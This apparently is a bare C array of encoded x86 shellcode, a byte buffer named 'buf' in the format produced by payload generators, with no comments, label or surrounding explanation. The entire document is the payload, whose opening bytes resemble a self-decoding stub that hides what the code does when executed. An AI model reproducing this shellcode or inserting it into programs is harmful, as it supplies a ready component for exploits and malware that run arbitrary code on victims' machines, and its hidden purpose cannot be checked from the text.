unsigned char buf[] = 
"\xb8\xda\x3b\x19\xc6\xdb\xd6\xd9\x74\x24\xf4\x5e\x31\xc9"
"\xb1\x3d\x31\x46\x15\x83\xee\xfc\x03\x46\x11\xe2\x2f\xe1"
"\xd9\x79\x51\x85\x41\xe6\xb4\xde\x51\x1d\x1e\x36\x53\x6c"
"\xa9\x79\x1b\x98\x56\x91\x27\xa5\xbe\xe2\xa1\x3c\x97\x0c"
"\x1b\x03\xfe\xe4\xe8\x2e\xd5\xe4\x90\x27\xe9\xd1\x4a\xd0"
"\x1e\xd1\x63\x84\xa7\x3e\x5f\x19\xb7\x39\x7d\xf8\x28\xf3"
"\x8f\x7e\xbe\xf5\x8f\x43\x8b\x4a\x9d\x1c\x28\xf5\xb4\x10"
"\xf6\x4e\x9a\xb1\xf7\x14\xf8\x19\x81\x76\x29\x90\x43\x95"
"\x7e\x9d\x9c\x12\x29\xba\x01\x72\xa3\x96\xa4\xcd\x55\x34"
"\xba\x23\x6e\xdb\xf1\x48\xe8\xd4\xc7\x38\xd4\x5f\x7a\xc9"
"\x43\xf6\xb9\xd7\xab\x3a\x5b\x37\x26\xa4\xcf\xd3\xda\xdf"
"\x7b\xdc\x7a\xfc\x87\x83\xf6\xa9\x28\x70\xc8\x4e\x65\x92"
"\xa9\xea\xa2\x40\xaf\xbc\x9a\x89\xd8\xcc\xb8\x2f\xdd\xc7"
"\x03\xd8\xa6\xac\x39\xd5\xe7\x5c\x7b\xe5\xae\xdc\xf2\xd7"
"\x86\xb3\x31\x68\x74\xc6\xcf\x51\xa3\xe6\xae\xda\x5b\x22"
"\x84\x9a\xad\xeb\xd9\xed\x35\x3a\x56\xde\xc0\x53\x8b\x8a"
"\xec\x65\xfc\x11\xcf\x1b\xec\xbd\xb6\xa1\xf5\x18\xc0\xdb"
"\x53\x20\x99\x66\x71\x24\x3d\xb2\xf7\x17\x49\x83\x95\x62"
"\x26\xd0\xbc\xb0\x9a\x4f\xb2\x5c\x97\xe0\x23\xc2\x92\x2a"
"\x9f\x15\x12\x2e";
